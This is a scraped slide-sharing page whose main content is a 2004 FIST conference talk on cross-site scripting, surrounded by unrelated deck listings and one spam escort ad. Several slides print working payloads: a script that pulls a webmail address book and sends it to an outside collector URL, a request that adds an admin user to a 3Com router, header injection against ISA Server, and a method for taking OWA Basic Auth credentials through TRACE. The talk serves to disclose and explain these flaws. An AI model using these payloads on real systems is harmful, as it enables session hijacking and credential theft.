Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 

Recently uploaded (20)

My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 

FIST Conference March 2004 XSS Presentation

  • 1. FIST Conference March 2004 Not only a XSS Toni Cortès Martínez Infohacking Research
  • 2. GUIDELINE  Guideline  Introduction  XSS Today  Let’s see some XSS Infohacking Research 2 Not O
  • 3. Introduction  What’s this?  XSS?  How it works?  Where it works?  Application level security.  OK, but it’s only a XSS. Infohacking Research 3 Not O
  • 4. XSS  XSS (common attacks)  When somebody can exploit user inputs to get a non expected response.  The error it’s usually due to a poor filtering on user inputs and/or on the output from dynamically generated pages.  This could allow access to something restricted to user, for example: session credentials (cookies, session Id’s, etc.) Infohacking Research 4 Not O
  • 5. How it works  How it work’s Attacker must trick the victim to make a special HTTP request.  Usually exploited on web environment: 1) Webmails 2) Web forums 3) Any web application (dynamic content) that allows user interaction  Other applications that render some output in HTML (log viewers, mail clients)“HTML inyection”. (like ILLC techniques)  Exploits a non secure programming methodology.  The attacker usually wants the victim to do something:  Sends out some cookie (session or permanent)  Make an HTTP request for you ;)  The goal of XSS: We are on the victim environment. Infohacking Research 5 Not O
  • 6. How it works  How it works, example  We found a flaw on a server (ex: online bank with email service)  Construct a special request to explot this flaw (XSS), and obtain user credentials.  Send a message to the victim (with window.open, img src, etc.)  Wait for the user access and get the session track cookie.  Access to the online bank with user credentials (stolen cookie)  Now we are this user for a few time. Infohacking Research 6 Not O
  • 7. Where it works  Where it Works?  Any dynamic generated content dependant on user’s input it’s a potential XSS security hole.  Enter your name: Toni  Hi Toni  Simple example of explotation on a dynamic page:  Enter your name: Toni<script>alert(‘Hello XSS’)</script>  Hi Toni Infohacking Research 7 Not O
  • 8. Application level security  Nowadays, the application level security is one of the computer challenges.  Application level firewalls like HIVE or layer 7 filters.  Client side security it’s out of control for webmasters.  Servers can only do their best trying to filter any data coming from client side.  Fact: most of the XSS based attacks and vulnerabilities are easy to exploit.  No special skills are needed -> script kiddies.  XSS is useful to impersonate a user but doesn’t provide a direct or easy way of controlling a computer…umm, well, you still can do lot of things ;-) Infohacking Research 8 Not O
  • 9. OK, but it’s only a XSS.  OK, but it’s only a XSS…  Yes, XSS attacks seem to be harmless by itself, but they could open other attack vectors.  We can gain access to a web-admin tool. (IIS 6.0 Web Admin XSS vulnerability)  XSS, breaks with old HTTP session tracking methods: use of ID’s on the URL, cookies and also source IP based authentication. (Iplanet Messaging Server XSS vulnerability)  Combination of XSS with other flaws to launch a more complex attack: -HOTMAIL XSS and AV bypass -Microsoft User Domain Credendials access via OWA XSS (via XST) Infohacking Research 9 Not O
  • 10. XSS Today  XSS today  XSS, next generation attacks.  Proof of concept: HTTP redirection  XSS based worms & trojans  XSS worm  XSS trojan  Anyone could be affected by XSS Infohacking Research 10 Not O
  • 11. XSS Next Generation  XSS next generation attacks.  HTTP response redirection (information leak) (Zeus Web Admin XSS)  HTTP bouncing (Full interactive) … under construction  Infohacking Research 11 Not O
  • 12. HTTP Redirection  Proof of concept: HTTP redirection  Example of an evil link that steals address book of the victim ‘s webmail: http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var %20xmlHttp%20=%20new %20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<t arget>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.respons eText;window.open(“http://www.infohacking.com/data_collector.php? response=“+xmlDoc);} pedo();</script> Infohacking Research 12 Not O
  • 13. HTTP Redirection  Which means: http://<target>/vulnerable.cgi?variable= (server path to script inyection) <script> function pedo() {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); xmlHttp.open("GET","http://<target>/address_book.cgi",false); // MAKE REQUEST xmlHttp.send(); xmlDoc=xmlHttp.responseText; // STORE RESPONSE window.open(“http://<attacker_site>/“+xmlDoc);} // SEND RESPONSE TO ATTACKER pedo(); </script> Note: we use “window.open” to send response in order to bypass “xmlHttp.open” security restrictions. Infohacking Research 13 Not O
  • 14. XSS based worms & trojans  General “features”  Spreading trough webmail servers  Self decrypting script routine  Can modify permanent cookies (trojan)  Can force session logout (D.o.S.)  Can impersonate the user  Can steal information (mail content, address book, etc)  Hard to be detected by AV software (encrypted payload)  If no user action is needed (as XSS on some field of the mail) then the spreading will be very fast! Infohacking Research 14 Not O
  • 15. XSS worm  How it works:  Once executed, the script will self decrypt and try to detect the source (Hotmail, Yahoo, Terra, …) or the webmail software (Iplanet, etc). It can be done with a simple “document.URL”, and comparing with some patterns.  If the source is known try to get address book  Filter only webmail addresses  Auto send routine Infohacking Research 15 Not O
  • 16. XSS trojan  How it works:  Once executed, the script will self decrypt and try to set a permanent cookie (will be stored on victim’s hard disk)  The modified cookie could change some option: it can set Chinese language as default ;-) (D.o.S.)  The modified cookie could redirect the victim to some place on the server that is controlled by the attacker (changing some profile setting in the cookie) As worms, trojan could try to spread away… Infohacking Research 16 Not O
  • 17. Anyone can be affected by XSS  Recent example: ViewCVS.py Affected sites: Sorceforge.net, Apache.org, Iptables.org. Those sites are well known to everybody, are probably they are managed by security concerned people… … anyway, they still can be exposed to XSS risks… Infohacking Research 17 Not O
  • 21. XSS Examples  Some XSS examples from Infohacking Research  3Com 812 ADSL router -> we add a new admin  Inktomi Traffic Server -> all user vulnerables by this XSS  Iplanet Messaging Server -> session hijack  Microsoft ISA Server ->  OWA XSS -> Access to user credentials Infohacking Research 21 Not O
  • 22. XSS on 3com ADSL router  There is a lot of XSS present on the OCR812  http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_I NJECT_CODE</b>")</script> Infohacking Research 22 Not O
  • 23. XSS on 3com ADSL router  With XSS we can insert new users to our router  We can use windows.open, or <img src=..> to make our special request  / Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserN ame=infohacking&uumUserPassword= Infohacking Research 23 Not O
  • 24. XSS on 3com ADSL router  We can make the complete process if we know IP, user and password (by example, old admin) <html> <img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg"> <script type="text/javascript"> var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP") xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>,false) xmlHttp.setRequestHeader("Authorization:", "Basic User:Password(base64 encoded)") xmlHttp.send() </script> </html> Infohacking Research 24 Not O
  • 25. Inktomi Traffic Server XSS  Inktomi Traffic Server is a proxy cache used on several countryes by ISP  Also know in Spain as “Proxy cache de Telefónica”  A special request by a client passing through the Inktomi Traffic- Server causes an error page generated by the proxy. This dynamic error page is vulnerable to Cross Site Scripting...  Indirectly any server whose clients come trough the Traffic- Server and using cookies to track sessions are "vulnerable".  The client making the request IS UNABLE to distinguish what domain generated this code... Infohacking Research 25 Not O
  • 26. Inktomi Traffic Server XSS  Exploit?  We test it over 5.5.1 version.  Only need configure a proxy on ANY IP with port 80.  Make a special request. http://<spoofed_domain>:443/</em><script>alert()</script> We can see the script executed on our browser, “generated” by the spoofed domain. Now, we can access to cookies, and everything, like man in the middle attack. Infohacking Research 26 Not O
  • 27. Iplanet messaging server XSS  This webmail, Iplanet messaging server allow us hijack the SID.  This server allows "online" opening of file attachments. This means that any html file will be opened by the client browser in the IPlanet webmail domain context. Wonderful XSS ;-) Now we can explode this XSS with a html attach. With document.URL we obtain the SID and userid (located on the URL) With the SID, we gain access to all attach. http://<iplanet_host>/attach/file.html? sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX &number=2&filename=file.html Infohacking Research 27 Not O
  • 28. Iplanet messaging server XSS  But this is not easy…. Iplanet webmail include a IP session tracking.  When we can use the hijacked SID?  If we are near the victim, behind a NAT device, we can access with his SID.  We can stole the session to all people who access trough a transparent proxy (like transparent proxy devices).  Or we can create a script to force user make request and redirect to us. Of course… they don’t see anything… (see above) Note: a lot of web server use the same session-cookie on both http and https domains. (This note is for the online bank developers). Infohacking Research 28 Not O
  • 29. Microsoft ISA Server XSS  This example shows an XSS exploited using headers  When we try to go an unreachable url trought ISA Server. ISA generate an error page, showing some data (the content of “via header”).  We fix this header.  Now we can request a non-existent URL into an existent domain. (usually server use the same cookie on all his domain)  Steal cookies   Access.  We don’t need a flaw on the server code. Use ISA Server instead. Infohacking Research 29 Not O
  • 30. ISA Server Exploit <html> <body> <script type="text/javascript"> alert("Click OK then wait for a few seconds...") var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP") xmlHttp.open("GET", "http://www.infohacking.com:113", false) xmlHttp.setRequestHeader("Via", "CODE_INJECTED_IN_VIA_HEADER<script>alert ("ISA_SERVER_XSS_by_INFOHACKING")</script>") xmlHttp.send() xmlDoc=xmlHttp.responseText document.write(xmlHttp.responseText) </script> </body> </html> Infohacking Research 30 Not O
  • 31. OWA XSS  What we have here?  With OWA you can see an HTML formatted e-mail  A user must click on a special link for this purpose in the webmail interface, and an alert will pop-up.  To avoid people executing malicious content in the client browser, the OWA will try to filter the content of the mail. Good, but… no enough. Infohacking Research 31 Not O
  • 32. Disabling OWA filtering  The URL to view an HTML formatted mail is something like this: http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<su bject>.EML/1_multipart/2_text.htm?Security=1 Good name for a parameter, other name maybe “change_this_for_fucking_us”  We only need to quit this parameter, and OWA don’t apply the filter. Infohacking Research 32 Not O
  • 33. OWA XSS  Obtaining data to create our special link.  We need IP or hostname of the server, user name and subject.  All this we can found on the “referer” header of an HTTP request coming from a link in the body of message. <img src="http://<site_of_the_attacker">  Now with referrer, we can send our attack.  We have the IP or hostname of server (from referrer)  We have the user name (from referer)  We know the subject  We create a link in the body of message, without the “security” parameter. (link to the same message without security parameter) Infohacking Research 33 Not O
  • 34. OWA, Stolen credentials  Nothing else?  OWA uses cookies to track the HTTP session, but also uses "Basic Auth" for... more security? ;-)  This “Basic Auth” (-> base64 encoded user:passwd) contains the user credentials for this domain.  To access the "Basic Auth" header, the easiest way is via an http "TRACE" request...and the IIS (Internet Information Server) by default will allow those kind of requests. Infohacking Research 34 Not O
  • 35. XSS  That’s all folks?? Of course, as always, imagination of the attacker is the only limit... much more fun is possible. Thanks For Your attention. Infohacking Research 35 Not O
  • 36. FIST Conference March 2004 Not only a XSS © Toni Cortes Martinez & Hugo Vazquez Carames Infohacking Research Barcelona, 7 May 2004

Editor's Notes

  1. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  2. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  3. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  4. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  5. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  6. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  7. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  8. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  9. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  10. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  11. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  12. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  13. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  14. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  15. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  16. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  17. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  18. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  19. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  20. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  21. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  22. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  23. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  24. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  25. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  26. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  27. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  28. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  29. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  30. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  31. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  32. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  33. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.